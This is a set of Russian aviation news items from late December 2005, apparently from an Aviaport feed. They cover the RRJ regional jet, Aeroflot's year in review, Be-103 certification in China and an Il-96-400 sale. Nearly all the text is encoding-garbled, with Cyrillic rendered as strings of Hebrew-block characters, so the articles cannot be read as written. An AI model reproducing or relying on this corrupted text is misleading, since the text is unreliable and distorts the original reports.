׀ֲֵֹֿׂׂ׃װֹ ־ֵ׃ֻּֿ״ֻֿ ִֵ׃ׁװֻֿ׳ ִֵֹֹּ. נֱּ־ֹׂױֵװ׃ׁ װֱֻײֵ ׀ֱִֿׂײֱ ־ֱ ֻ׃׀ֿׂװ: RRJ ׃׀ֵֻֿׂװֹֿׂ׳ֱ־ ֱֻֻ ׃ֿ׳ֵֵֽׂ־־ "ֵ׳ֿׂ׀ֳֵֵ", ֿװ׳ְֱֵֹ ׳׃ֵֽ ֵֽײִױ־ֱִֿׂ־ֽ ׃װֱ־ֱִׂװֱֽ ֹ װֲֵֿׂ׳ֱ־ֹֽׁ. כֵֽֿׂ ׃ֵֹׂ־ַֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֱ ־ֿ׳ֵֵַֿ ףױ-34 ֹ ֱ׳ֵֵׂ־ֹׁ ׀ִַֿֿװֿ׳ֹֻ ׀ֹֿׂ׳ִֿ׃װ׳ֱ ׃ֱֵּֽֿװֱ RRJ, ־ֱֵ ׀ִֵׂ׀ֹׁׂװֵֹ ׳ ֲױִױֵֽ ִַֿױ ײִױװ ־ֱֱׂ׃װְֱֵֹ ֲֵֽֿ ִֵֽֿׂ־ֱֳֹֹֹ ׃ֱֵּֽֿװֱ ףױ-24. קִֵ״ מֿ׳ֿ׃ֲֹֹׂ׃ֻ ֲּ ִֵֹ־׃װ׳ֵ־־ֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ֿ ׀ֱִֻּֿֿ, ֿװֻױֱִ ׳ִָֹֹּֿ װֹ ׀ֱֵֻׂׂ׃־ֵ ֱֹֽ־ ׳׀ּֿװ״ ִֿ 1993 ֱִַֿ. ףֱֵ׃ ָֹ ׀ֿװֹ װ׃ֱׁ ׀ֿ ׳׃ֵֽױ ֹֽׂױ, ֹ ׳׃ֵ ֿ־ֹ ־ױײְֱִװ׃ׁ ׳ ִֵֽֿׂ־ֱֳֹֹֹ, ֻֿװֱֿׁׂ ׃׀ֿ׃ֲֿ־ֱ ֱֵֽװ־ֿ ׀ֱֲֵֹֿׂׂװ״ ָֹ ֲֵֿ׳ֵ ֱֱָֻׂװֵֹׂ׃װֹֹֻ. פֱֻ װֿ ׀ֿװֻֿ ֱׁ׳ֻֿ ־ֱ ִֵֽֿׂ־ְֱֳֹֹ ־ֱָֹ ֱֻּׂװָ ׀ֹװֳֵֽֿ׳, ׃ֵֵֻֿׂ ׳׃ֵַֿ, ֲױִֵװ ־ֱֱׂ׃װֱװ״.ןִ־ֹֽ ֹ ־ֱ׀ֱׂ׳ֵּ־ֹ ִֵׁװֵּ״־ֿ׃װֹ ־ֱֵַֿ ֱ׳ֱִֿ, ֿ ֻֿװֽֿֿׂ ־ֵּ״ׁ ־ֵ ױ׀ֽֿׁ־ױװ״, ֲױִֵװ ב־-38. הֿ׃װֱ׳ֹ׃ׁ ־ֱֽ ׳ ־ֱ׃ִֵּ׃װ׳ֿ ֿװ ִֹּװֵּ״־ַֿֿ ֹ ׀ִּֿֿװ׳ֿׂ־ַֿֿ ׃ֿװׂױִ־ֵֹ׃װ׳ֱ ׃ ןכג ב־װֿ־ֿ׳ֱ (־־ֵ ֱׂױֲֵײ־ַֿֿ), װֿװ ־ֲֵּֿ״ֿ ַׂױֿ׀ֱ׃׃ֱײֹׂ׃ֹֻ ׃ֱֵּֽֿװ ֱֱִֻּֿ ׃׳ֵֿ ׀ֱׂ׳ֿ ־ֱ ײֹ־״. קֿ ׳׃ֻֽֿׁ ׃ּױֱֵ, ִֿ׃װֱװֿ־ֿ ױ׃װֹֿ׳ ׃׀ֿׂ׃ ־ֱ ־ֵַֿ ִֵֽֿ־׃װֹׂׂױְװ ׃װֱׂ־ אַֿ-קֿ׃װֿ־ֿ בֹֹ, ִֵַ ־ֱֱ ־ֵ׀ָֹֿׂװֹּ׳ֱׁ ֱֹֽ־ֱ ֱֱֱֻּֿ׃״ ׳׀ּֿ־ֵ ׀ֵֵֹּֽֽֿׂ ִּׁ ֵֽ׃װ־ָ ֱ׳ֱֹֹּ־ֹ. ם ֲױִֵֽ ׀ִּֿֿׂײֱװ״ ׃ֿ׳ֵֵׂ־׃װ׳ֿ׳ֱװ״ װֿװ ׃ֱֵּֽֿװ, ֲױִױֹ ױ׳ֵֵׂ־־ֹֽ, װֿ ֿ־ ׀ֿװֲֵׂױֵװ׃ׁ ֹ ׳ ־ֱֵֽ ןװֵֵ׃װ׳ֵ.כֿ־ֵ־ֿ ײֵ, ׳׃ֵ ִֿ׃װֹײֵ־ֹׁ ֹ ׳׃ֵ ׀ֱּ־ ־ֱ ֲױִױֵֵ מבנן ֹֽ. ק. נ. ‏ֱֻּֿ׳ֱ ׃ֿ׀ׁׂײֵ־ ׃ ־ֱֹֽ ֵֻֻּּֿװֹ׳ֽֿ, ׳ֵװֱֵׂ־ֱֹֽ ֹ ־ֿ׳ֹֽ ׀ֵֻּֿֿ־ֹֹֽׁ ֱ׳ֱִֿ־. יֽ ׃װֹֿׂװ״ ֲױִױֵֹ ׃ֱֵּֽֿװ. נֿװֽֿױ ֽ ֲױִֵֽ ׀ִּֿֿׂײֱװ״ ־ֱֱֹׂ׳ֱװ״ ױ׃ֹֹּׁ ׀ֿ ׃ֱֳֹּֿ״־ֿ ֱֹװֵ ־ֱָֹ ֱֲֿׂװ־ֹֻֿ׳. ק ־ֲֵֿׁׂ ׳ֿׂ׃ֱּ ֱׂ׀ֱּװֱ ױ ֱֲָֹֿׂ. ק ֲֹּײֱֵֵ ׳ֵֽׁׂ ײִֵװ ׀ֿ׳ֵ־ֵֹ ׳ֿ־ֱֱַׂײִֵ־ֹׁ ִּׁ ִׂױַָֹ ֱֻװֵַֹֿׂ ֱֲֿׂװ־ֹֻֿ׳ ֲִֵֹֿ־ֵ־ֹׁ. נֿ ֵֵֽׂ ֻֿ־ֵֹֽֿ׃ַֻֿֿ ױֵֻׂ׀ֵּ־ֹׁ ׀ִֵׂ׀ֹׁׂװֹׁ, ֽ ־ֱֵֵֽׂ־ ׳ֵׂ־ױװ״ ׳ֵ׃״ ֲֵֽֿ ׃ֱֳֹּֿ״־ָ ֱֱַׂ־װֹ ִּׁ ֱֲֿׂװ־ֹֻֿ׳ מבנן ֹֽ. ק.נ. ‏ֱֻּֿ׳ֱ.ףִֵַֿ־ׁ, ׀ִֿ׳ִֿׁ ֹװַֹֿ ױִֵַָֿֿׁ ֱִַֿ, ֽֿײ־ֿ ׃ֱֱֻװ״: ֱֱִֹ, ֻֿװֵֿׂ ֽ ׃װֱ׳ֹֹּ ׀ִֵֵׂ ׃ֲֿֿ, ׳׀ּֿ־ֵ־ ֹ ׳ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ֽֿ ־ֱ׀ֱׂ׳ֵּ־ֹֹ, ֹ ׳ ֵֵׂ־ֹֹ ׃ֱֳֹּֿ״־ָ ׀ֲֵּֽֿׂ ־ֱ ׀ִֵׂ׀ֹׁׂװֹֹ. נֹׂ װֽֿ ־ֲִֵָֹֽֿֿֿ ׀ִֵֻֿׂ־ױװ״, װֿ ׃װֵֹֿׁ ׀ִֵֵׂ ֵֻֻּּֿװֹ׳ֽֿ ֱֻּֿ׳ֳֵ׳ ֱֱִֹ ־ֱ 2006 ִַֿ ׀ֿ ׃׳ֵֽֿױ ױֿׂ׳־ְ, ־ֱ׀ׁׂײֵ־־ֿ׃װֹ, ֲֵֽֿױ ֲֵֵּֿ ׃ּֿײ־ֵ, ֵֽ ֵֵׂ־־ֵ ׳ װֵֵ־ֵֹ 2005 ֱִַֿ. מֿ ׁ ױ׳ֵֵׂ־: ־ֱֵֽױ ֵֻֻּּֿװֹ׳ױ ֿ־ֹ ׀ֿ ׀ֵּױ, ֽ ׃׀ֱׂ׳ֹֽ׃ׁ ׃ֿ ׳׃ֵֹֽ װׂױִ־ֿ׃װֹֽׁ ֹ ׀ֱֲֵֹּֽֽֿׂ! ק ֱֻ־ױ־ ־ֿ׳ִַֿֿ־ָֹ ׀ֱִׂ־ֹֻֿ׳ ׃ִֵֵׂ־ֿ ׀ֱִֿׂ׳ְּׁ ׳׃ֵָ ֱֻּֿ׳ֳֵ׳ ֹ ײֹװֵֵּ מֿ׳ֿ׃ֲֹֹׂ׃ֱֻ ׃ מֿ׳ֽ ִַֽֿֿ. ןװ ׳׃ֵ ִױֹ ײְֱֵּ ֵֻׂ׀ַֻֿֿ ִֿֿׂ׳״ׁ, ֿ׀װֱֹֹֽֽ, ־ֵֹ׃׃ֱֵֻֽֿׁ ־ֵַֹֹׂ ֹ ׳׃ֵׁ׃ָֹֻ ֱֲַּ. ‏ֹ׃װַֿֿ ־ֱֲֵ, ְֲּ׳ֹ ֹ ױֱִֹ! - - - - - נֶֿׂ׃ְֿ־ ֹֻֽֿװֵװ תבן "ב׳ֱֹ׃װֱׂ-ףנ" ׀ֱֲֿֿװֹּ׃ׁ ֿ ־ֿ׳ִַֿֿ־ָֹ ׀ֱֱִָֻֿׂ ֵֻֻּּֿװֹ׳ױ - http://www.aviaport.ru/news/2005/12/29/99255.html - מֱ׃ֵ־־ױְ ׀ֱַֽֽֿׂׂױ ־ֿ׳ִַֿֿ־ָֹ ׀ֱִׂ־ֹֻֿ׳ ׀ִַֿֿװֿ׳ֹּ ִּׁ ױּ״ׁ־ֿ׳׃ָֹֻ ֱ׳ֱֹ׃װֹֿׂװֵֵּ ׀ֶֿׂ׃ְֿ־ ֹֻֽֿװֵװ תבן "ב׳ֱֹ׃װֱׂ-ףנ" - Thu, 29 Dec 2005 16:10:00 +0300 - מֱ׃ֵ־־ױְ ׀ֱַֽֽֿׂׂױ ־ֿ׳ִַֿֿ־ָֹ ׀ֱִׂ־ֹֻֿ׳ ׀ִַֿֿװֿ׳ֹּ ִּׁ ױּ״ׁ־ֿ׳׃ָֹֻ ֱ׳ֱֹ׃װֹֿׂװֵֵּ ׀ֶֿׂ׃ְֿ־ ֹֻֽֿװֵװ תבן "ב׳ֱֹ׃װֱׂ-ףנ". ףֱֹֹּֽ ִֵּֽֿֿײ־ַֿֿ ֹֻֽֿװֵװֱ ׀ֱֶֻֽֿֿׂ ׀ֿׂ׳ִֵֵ־ ֲּֿ״ֿ ׀ֱִׂ־ֹ־ ֻֿ־ֳֵׂװ. נֶֿׂ׃ְֿ־ֵ ֱַֿׂ־ֱֹװֿׂ ׀ֲֿ׳ֱֹּ ֱִֽֿ ױ ׀ֵ־׃ֹֿ־ֵֿׂ׳ - ׳ֵװֱֵׂ־ֿ׳ ֱ׳ֱִֿ, ֹ־׳ֱִֹּֿ׳ װׂױֱִ. הּׁ ִֵװֵ ֱ׳ֱֹ׃װֹֿׂװֵֵּ ֱַֿׂ־ֹֿ׳ֱ־ ֵֹֻׁׂ ׀ִֵׂ׃װֱ׳ֵּ־ֹׁ ױ ־ֿ׳ִַֿֿ־ֵ ֵֹֻּ. 70 ־ֿ׳ִַֿֿ־ָֹ ׀ֱִֻֿֿׂ׳ ֲּֿ ׀ֱִֵֵׂ־ֿ ֲֵׁׂװֱֽ ‏ֱִֵֹֻּׂ־׃ַֻֿֿ ִֵװ׃ַֻֿֿ ֱִֽֿ, ֵֶֽֿ ֻֿװַֿֿֿׂ תבן "ב׳ֱֹ׃װֱׂ-ףנ" ׁ׳ֵּׁװ׃ׁ ױײֵ ֽ־ַֿֿ ֵּװ. ק׃ֵַֿ ִּׁ ִֵװֵ ֱֲֿׂװ־ֹֻֿ׳ ֱ׳ֱִֿ ֹ ֵּ־ֿ׳ ׀ֶֿׂ׃ְֿ־ַֿֿ ֹֻֽֿװֵװֱ ׀ִַֿֿװֿ׳ֵּ־ֿ ֲֵֵּֿ 6000 ׀ֱִֻֿֿׂ׳. - - - - - בֶּֿֿׂװ ׳ 2005 ִַֿױ - http://www.aviaport.ru/news/2005/12/29/99254.html - הֵ׀ֱׂװֱֵֽ־װ ֲֵֿ׃װ׳ֵ־־ָ ׃׳ֵׁ ןבן "בֶּֿֿׂװ" ׀ִֵׂ׃װֱ׳ֵּׁװ ׃׀ֹ׃ֻֿ ׃ֱָֽ ־ֱָֹֽ ׃ֲֿװֹ ׳ ײֹ־ֹ ֻֽֿ׀ֱ־ֹֹ ׳ 2005 ַ. - Thu, 29 Dec 2005 15:27:00 +0300 - ק ֱֻ־ױ־ ־ֿ׳ִַֿֿ־ָֹ ׀ֱִׂ־ֹֻֿ׳ הֵ׀ֱׂװֱֵֽ־װ ֲֵֿ׃װ׳ֵ־־ָ ׃׳ֵׁ ׀ִֿ׳ִֹֿװ ֹװַֹֿ ֱִַֿ ֹ ׀ִֵׂ׃װֱ׳ֵּׁװ ׃׀ֹ׃ֻֿ ׃ֱָֽ ־ֱָֹֽ ׃ֲֿװֹ ׳ ײֹ־ֹ ֻֽֿ׀ֱ־ֹֹ ׳ 2005 ִַֿױ.ס־׳ֱׂ״ - ֱ׳ֱֹֻֽֿ׀ֱ־ֹׁ ִֿ׃װֱַֹּ ױֿׂ׳־ׁ ֲֵֿ׀ֱ׃־ֿ׃װֹ ׀ֵּֿװֿ׳ 99,95%, װֿ ׳ִָֹֿװ ׳ ׃ִֵׂ־ֹ ֱִֹ׀ֱֿ־ ׀ֿ ֱֻּ׃׃ֱֳֶֹֹֹֹֻ ICAO (99,90 - 99,98%).זֵ׳ֱּׂ״ - ֱ׳ֱֹֻֽֿ׀ֱ־ֹׁ "בֶּֿֿׂװ - ֿׂ׃׃ֹ׃ֵֹֻ ֱ׳ֱֹֹּ־ֹֹ" ֹ ב׃׃ֱֳֳֹֹֿׁ ֱֱָֽװ־ָ ֱֳִֵֵֶֹׂ ׃ֿ׳ֵֽ׃װ־ֿ ׃ כֹֽֿװֵװֽֿ ׀ֿ װױֹֽׂױ נֱׂ׳ֹװֵּ״׃װ׳ֱ םֿ׃ֻ׳ ׀ֿׂ׳ֵֹּ ֱֱָֽװ־ װױׂ־ֹׂ "Aeroflot Open 2005" ׃ ׀ֹֿׂ׳ֽ ֶֿ־ִֽֿ ׳ 175 װ׃ׁ ֱִּּֿֿׂ׳.םֱׂװ - בֶּֿֿׂװ ֿ׃ױֵ׃װ׳ֹּ ׀ִֵֵָֿׂ ־ֱ ֱ׳װֱֽֿװֹֹֿׂ׳ֱ־־ױְ ׃ֹ׃װֵֽױ ֲֿׂ־ֹֿׂ׳ֱ־ֹׁ ֹ ׀ֱִֿׂײֹ ֲֵֹּװֿ׳ ףֲֵׂ.ב׀ֵּׂ״ - ֱ׳ֱֹֻֽֿ׀ֱ־ֹׁ ׃װֱֱּ ֱּױֱֵׂװֽֿ ־ֱֳֹֿ־ֱּ״־ֿ ׀ֵֹֹֽׂ "תּֿֿװֱׁ ֱֽ׃ֱֻ - 2005" ׳ ׀ֵֿװ־ֿ ־ֹֽֿ־ֱֳֹֹ "תֱ ׀ִִֵֿׂײֻױ װֱֵװֱּׂ״־ַֿֿ ֹ׃ֻױ׃׃װ׳ֱ עֿ׃׃ֹֹ".םֱ - ֱֳֹֻׁ בֶּֿֿׂװֱ "אֲֵֹּ קֵֹֻּֿ נֲִֵֿ", ׳ ֱֱָֻֽׂ ֻֿװֿֿׂ ֲֵ׃׀ֱּװ־ֹֽ ֲֵֹּװֱֹֽ ִּׁ ׀ֵֵֵּׂװֱ ׳ ֱִַֿֿׂ עֿ׃׃ֹ׃ֻֿ זֱֳִֵֵֹֹׂ, ׳ ׃װֱׂ־ תֱ׀ֱִ־ֿ ו׳ֿׂ׀, ףמח ֹ גֱּװֹֹ ׳ֿ׃׀ּֿ״ֿ׳ֱֹּ׃״ ֲֵֵּֿ ׀ׁװֹ ׃ ׀ּֿֿ׳ֹ־ֿ װ׃ׁ ׳ֵװֱֵׂ־ֿ׳ - ֶֿׂ־װֿ׳ֹֻֿ׳, ֲ׳ָֹ ױ־ֹֻֿ׳ ֱֱֶֹֽ, ֱֲִֻּֿ־ֹֻֿ׳ לֵ־ֹ־ֱֱִַׂ.יְ־״ - ֿ׀ִֵֵֵּׂ־ ֵַ־ֱֵּׂ״־ ׀ִִֹֻֿׁׂ (ֱֶֹֽׂ "Enka") ֹ ־ֱֱװֿ ׃װֹֿׂװֵּ״׃װ׳ֿ װֵֹֽׂ־ֱֱּ ֵֵֵֽׂװ״ֵ׳ֿ-3.יְּ״ - בֶּֿֿׂװ ׃װֱּ ׀ֲִֵֹֿװֵֵּֽ ׀ֵׂ׳ַֿֿ ׳׃ֵֿׂ׃׃ֹ׃ַֻֿֿ ֻֿ־ֻױׂ׃ֱ "לױֱׁ ֿׂ׃׃ֹ׃ֱֻׁ ֱִֻֿׂ׳ֱׁ ׃ּױײֱֲ 2005 ֱִַֿ".ב׳ַױ׃װ - ֿ׃װֱ־ֿ׳ֵּ־ ׀ֱֻׂ יּ-96, װֿ ׀ֿװֲֵֿׂ׳ֱּֿ ֿ׀ֱֵׂװֹ׳־ַֿֿ ֱֽ־ֵ׳ֱׂ ֶּֿװֽֿ, ׃ֿׂ־ֿ ֿ׀װֱֳֹֹֹֹֽ ֱֽׂׂױװ־ֿ ׃ֵװֹ, ׀ֹׂ׳ֵֵּ־ֹׁ קף ִׂױַָֹ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ. מֵ׃ֽֿװׁׂ ־ֱ ׃ּֿײ־ֿ׃װ״ ׃ֹװױֱֳֹֹ ֹ ױֲװֹֻ ׳׃ֵ ֱֲֿׁװֵּ״׃װ׳ֱ ׀ִֵֵׂ ׀ֱ׃׃ֱײֱֹֹֽׂ ֹ ֵֹֻּ־װֱֹֽ ׳׀ּֿ־ֵ־.ףֵ־װֲׁׂ״ - בֶּֿֿׂװ ׀ִִֵֿׂײֱּ ׳׃װֱ׳ֻױ "עֿ׃׃ֹׁ!", ֻֿװֿׂױְ ׀ֿ ׃ּױְֱ 60-ֵּװֹׁ ןןמ ֿװֻּׂ ׳ מ״ְ-ךֵֻֿׂ ׀ִֵֵֹׂ־װ עז קֱִֹֹּֽׂ נױװֹ־.ןֻװֲׁׂ״ - בֶּֿֿׂװ ױ׃׀ֵ־ֿ ׀ֵּֿׂ ֱױִֹװֿׂ׃ֻױְ ׀ֿׂ׳ֵֻׂױ ־ֱ ׃ֿֿװ׳ֵװ׃װ׳ֵֹ ׃װֱ־ֱִׂװֱֽ ֻ׃׀ּױֱװֱֳֹֿ־־ֿ ֲֵֿ׀ֱ׃־ֿ׃װֹ IATA-IOSA.מֲֿׁׂ״ - ֱֱֲִַֹׂ ֲֿׂװ׀ֿׂ׳ִֿ־ֹֻֿ׳ בֶּֿֿׂװֱ ׀ֹׂ־ֱּׁ ִֿׂ ־ֱ ֲֿׂװױ ׃ֱֵּֽֿװֱ, ׃ִֵּֿ׳ֱ׳ֵַֿ ֹ םֿ׃ֻ׳ ׳ לֿ׃-ב־ִײֵֵּ׃.הֱֲֵֻׂ״ - ֱ׳ֵֵׂ־ װֵ־ִֵׂ ֹ ׀ִֿ׀ֹ׃ֱ־ ֻֿ־װֱֻׂװ ־ֱ ׀ֿ׃װֱ׳ֻױ בֶּֿֿׂװױ 30 ׃ֱֵּֽֿװֿ׳ RRJ.ןבן "בֶּֿֿׂװ - ֿׂ׃׃ֹ׃ֵֹֻ ֱ׳ֱֹֹּ־ֹֹ" (עפף: AFLT) - ֻׂױ׀־ֱֵׁ ֿׂ׃׃ֹ׃ֱֻׁ ֱ׳ֱֹֻֽֿ׀ֱ־ֹׁ. 51% ֱֳֹֻ ׀ֹׂ־ֱִֵּײֹװ ַֿ׃ױֱִׂ׃װ׳ױ. ן׃־ֿ׳ֱ־ֱ ׳ 1923 ִַֿױ. כֿ־װֹּֿׂׂױֵװ ׀ֱִֻֿׁׂ 11% ׳־ױװֵׂ־־ֵַֿ ֹ 39% ֵֽײִױ־ֱִֿׂ־ַֿֿ ׂ־ֱֻ ֱ׳ֱֹ׀ֵֵׂ׳ֻֿֿ עֿ׃׃ֹֹ. ‏ֹ׃װֱׁ ׀ֲֹּׂ״ ֱ 2004 ַ. ׃ֿ׃װֱ׳ֱֹּ 6330,143 ּֽ־ ׂױֲֵּ (219 ּֽ־ ֻ׳. ִּּֿ. ףב). קִָֹֿװ ׳ ׃׀ֹ׃ֻֿ 25 ׳ִֵױָֹ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ ֱֹֽׂ ׀ֿ ֶֹ־ֱ־׃ֿ׳ֽ ׀ֱֱֻֿװֵּֽׁ (׀ֿ ׳ֵׂ׃ֹֹ ATW). ק 2004 ִַֿױ בֶּֿֿׂװ ׀ֵֵׂ׳ֵ 6,862 ּֽ־ ׀ֱ׃׃ֱײֹֿׂ׳. נֱֻׂ ׃ֿ׃װֹֿװ ֹ 90 ׃ֱֵּֽֿװֿ׳. גֱֹׂױֵװ׃ׁ ׳ םֿ׃ֻ׳ֵ, ֱֿׂ׀ֿׂװ ֵֵֵֽׂװ״ֵ׳ֿ. נֱּ־ֹׂױֵװ ֻ 2007 ִַֿױ ׀ֿ׃װֹֿׂװ״ ׃ֲֿ׃װ׳ֵ־־ װֵֹֽׂ־ֱּ "ֵֵֵֽׂװ״ֵ׳ֿ-3". - - - - - ףֱֵּֽֿװ-ֱֲֶֹֹֽׁ גֵ-103 ׀ֹֿׂ׳ִֿ׃װ׳ֱ פבמפכ ֹֽ. ח.ם. גֵֵֹׂ׳ֱ ׀ּֿױֹּ ֹֻװֱ׃ֹֻ ׃ֵׂװֱֶֹֹֻװ - http://www.aviaport.ru/news/2005/12/29/99253.html - ץ׀ֱׂ׳ֵּ־ֵֹ ֱַׂײֱִ־׃ֻֿ ֱ׳ֱֳֹֹֹ כֹװֱׁ ֱ׳ֵֹּֿׂ ׀ֳֵֿׂ׃׃ ׃ֵׂװֱֳֶֹֹֹֹֻ ֵַַֻּֿֿ ֽ־ֳֵֵַּֿֿ׳ַֿֿ ׃ֱֵּֽֿװֱ-ֱֲֶֹֹֹֽ גֵ-103 - Thu, 29 Dec 2005 15:22:00 +0300 - ץ׀ֱׂ׳ֵּ־ֵֹ ֱַׂײֱִ־׃ֻֿ ֱ׳ֱֳֹֹֹ כֹװֱׁ (CAAC) ֱ׳ֵֹּֿׂ ׀ֳֵֿׂ׃׃ ׃ֵׂװֱֳֶֹֹֹֹֻ ֵַַֻּֿֿ ֽ־ֳֵֵַּֿֿ׳ַֿֿ ׃ֱֵּֽֿװֱ-ֱֲֶֹֹֹֽ גֵ-103.גֵ-103 ׀ּֿױֹּ ֹֻװֱ׃ֹֻ ׃ֵׂװֱֶֹֹֻװ װֹ׀ֱ № VTC173A, װֿ ׀ֿ׳ֵּֿׁװ ־ֱֱװ״ ׀ֿ׃װֱ׳ֹֻ ׃ֱֵּֽֿװֿ׳ ׀ֵׂ׳ֽ ֱֱֱֹֻֻֽ ׳ כֹװֱ׃ֻֿ מֱִֿׂ־ֿ עֵ׃׀ױֲֵֹֻּ.ףֱֵּֽֿװ-ֱֲֶֹֹֽׁ גֵ-103 ֱֱֲֿׂׂװֱ־ ׳ ׃ֿֿװ׳ֵװ׃װ׳ֹֹ ׃ װֲֵֿׂ׳ֱ־ֹֹֽׁ ֱ׳ֱֳֹֹֿ־־ָ ׀ֱׂ׳ֹּ בנ-23, FAR-23, JAR-23 ֹ ֵֵֹֽװ ֿׂ׃׃ֹ׃ֹֻ ׃ֵׂװֱֶֹֹֻװ װֹ׀ֱ ־ֱּֽֿׂ״־ֿ ֱֻװֵַֹֹֿׂ. ק 2003 ִַֿױ ֿ־ ׃ֵׂװֳֶֹֹֹֿׂ׳ֱ־ ׀ֿ ־ֱֽֽֿׂ זֱִֵֵּׂ״־ֿ ֱ׳ֱֳֹֹֿ־־ֿ ֱִֹֽ־ֹ׃װֱֳֹֹׂ ףב, ׳ 2005 ִַֿױ ׀ּֿױֹּ ׃ֵׂװֱֶֹֹֻװ ֵּװ־ֿ ִַֿ־ֿ׃װֹ ׳ גֱֹֹֹּׂ. ק ־ֱ׃װֵֵֿׁ ׳ֵֽׁׂ ׀ִָֿֿׁׂװ ׀ֵֵַֿׂ׳ֿׂ ֿ ׀ֿ׃װֱ׳ֱָֻ ׃ֱֵּֽֿװֿ׳-ֱֲֶֹֹֽ ֹ ִׂױַֹֽ ֱׂױֲֵײ־ֽ ֱֱֱֹֻֻֽ. - - - - - "יּ״ְֹ־ זֹ־ֱ־׃" ־ֱֵֵֽׂ־ ׀ֱִֿׂװ״ ׳ כֹװֱ ׳ֿ׃ֵֽ״ יּ-96-400 - http://www.aviaport.ru/news/2005/12/29/99252.html - יזכ ֱׂ׃׃ֹװ׳ֱֵװ ׀ֱִֿׂװ״ ִֿ־ֿ ֹ ֹֻװֱ׃ָֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ ׳ֿ׃ֵֽ״ ַׂױֿ׳ָ יּ-96-400. גֱֿ׳ֱׁ ֳֵ־ֱ װֱַֻֿֿ ׃ֱֵּֽֿװֱ ׃ֿ׃װֱ׳ֵּׁװ ֻּֿֿֿ $50 ּֽ־. - Thu, 29 Dec 2005 14:41:00 +0300 - לֹֹ־ַֿ׳ֱׁ ֻֽֿ׀ֱ־ֹׁ "יּ״ְֹ־ זֹ־ֱ־׃" (יזכ) ֱׂ׃׃ֹװ׳ֱֵװ ׀ֱִֿׂװ״ ִֿ־ֿ ֹ ֹֻװֱ׃ָֹֻ ֱ׳ֱֹֻֽֿ׀ֱ־ֹ ׳ֿ׃ֵֽ״ ַׂױֿ׳ָ יּ-96-400, ׃ֱֱֻּ Reuters ֵַ־ִֵֹֻׂװֿׂ בֵֻּ׃ֱ־ִׂ עױֲֳֿ׳.גֱֿ׳ֱׁ ֳֵ־ֱ װֱַֻֿֿ ׃ֱֵּֽֿװֱ ׃ֿ׃װֱ׳ֵּׁװ ֻּֿֿֿ $50 ּֽ־. ק װֽֿ ִַֿױ ֿׂ׃׃ֹ׃ֵֹֻ ׳ֱּ׃װֹ ־ֱ ־ֵֻֿװֵֿֿׂ ׳ֵֽׁׂ ֱ׀ֵׂװֹֹּ ֻ׃׀ּױֱװְֱֳֹ יּ-96 ֹ-ֱ ֱִׁׂ ִֵֵֶֻװֿ׳, ׳ְֱֻּׁ װֽֿֿׂ־ױְ ׃ֹ׃װֵֽױ, ־ֱ׀ֹֽֿ־ֱֵװ Reuters."נֱֱֲֿׂׂװ׳ֱֵװ׃ׁ ׃ֱִֵֻּ ־ֱ ׀ֿ׃װֱ׳ֻױ יּ-96-400 ׳ כֹװֱ. ו׃װ״ ִֹֿ־ ֱֱֹֻֻ", - ׃ֱֱֻּ ֿ־, ־ֵ ־ֱ׳ֱ׳ ֻֽֿ׀ֱ־ְֹ. עױֲֳֿ׳ ֱֲִֿ׳ֹּ, װֿ יזכ ֱׂ׃׃ֹװ׳ֱֵװ ־ֱ ׀ֿװֵ־ֱֳֹּ״־ָ ׀ֻֿױ׀ֱװֵֵּ ׳ יֱׂ־ֵ ֹ ףֹֹֹׂ, ־ֿ ־ֵ ׀ֹׂ׳ֵּ ׀ֲִֿֿׂ־ֿ׃װֹ.כֽֿ׀ֱ־ֹׁ "יּ״ְֹ־ זֹ־ֱ־׃ כֿ." (יזכ) ֱֲּ ׃ֱִֿ־ֱ ׳ 1999 ִַֿױ ׀ֿ ֹ־ֱֳֹֹװֹ׳ֵ ב׳ֱֳֹֹֿ־־ַֿֿ ֻֽֿ׀ֵֻּ׃ֱ ף. ק. יּ״ְֹ־ֱ. ן׃־ֿ׳־ֿ ׳ִֹ ִֵׁװֵּ״־ֿ׃װֹ יזכ - ֶֹ־ֱ־׃ֿ׳ ֹ ֿ׀ֱֳֵֹֿׂ־־ ֹֹּ־ַ ֱ׳ֱֳֹֹֿ־־ֿ װֵָ־ֹֹֻ ֿׂ׃׃ֹ׃ַֻֿֿ ׀ֹֿׂ׳ִֿ׃װ׳ֱ. כֽֿ׀ֱ־ֹׁ ֱׁ׳ֱֹּ ֿ ׃ֲֵֵ ֱֻֻ ֿ ׃װֱׂװֵֵַֹ׃ֻֽֿ ֹ־׳ֵ׃װֵֿׂ ־ֱֲֵֵֹּֿ ֻֿ־ֻױֵׂ־װֿ׃׀ֿ׃ֲֿ־ָ ׀ִֵׂ׀ֹׁׂװֹ ֿװֱׂ׃ֹּ. ק ־ֱ׃װֵֵֿׁ ׳ֵֽׁׂ ֱ־ֱֵֹֽװ ׀ֿׂ־ֵ ׀ֳֹֹֹֿ ׳ ֿװֱׂ׃ֹּ ֱֻֻ ִֿ־ֿ ֹ ׳ִֵױָֹ ׃׀ֱֳֵֹֹֹּֿׂ׳ֱ־־ָ ֱ׳ֱֹֹֹּ־ַֿ׳ָ ׀ִֵׂ׀ֹׁׂװֹ עֿ׃׃ֹֹ, ִֹֹּׂױְֵֵ ׀ֿ ֲֵֽֿױ ׃ֲֿ׃װ׳ֵ־־ַֿֿ ֱֻ׀ֹװֱֱּ ֹ ׳ֵֹֹּ־ֵ ׀ֿׂװֵֶּׁ ֱֱֻֿ׳. ף ֵֽֽֿ־װֱ ׃׳ֵַֿֿ ֱֲֿֿׂ׳ֱ־ֹׁ יזכ ׃ֶֹֽֿֿׂׂ׳ֱֱּ ׀ֱֵֻװ ֱֱֻֿ׳ ־ֱ ֻׂױ׀־ֵָֹ ֱ׳ֱֹ׃װֹֿׂװֵּ״־ָ ֱ׳ֱִָֿ עֿ׃׃ֹֹ, ֱֱֲִַּֿׁׂ ֻֿװֽֿׂ ֲּֿ ׀ֿ׃װֵֿׂ־ֿ 8 ־ֿ׳ָ ֱִּ״־ֱֵַֹֽ׃װֱּׂ״־ָ ׃ֱֵּֽֿװֿ׳ ׃ֵֵֽ׃װ׳ֱ יּ-96 ־ֱ קֿֿׂ־ֵײ׃ֻֽֿ ֱֳֹֻֿ־ֵׂ־ֽֿ ׃ֱֵּֽֿװֿ׃װֹֿׂװֵּ״־ֽֿ 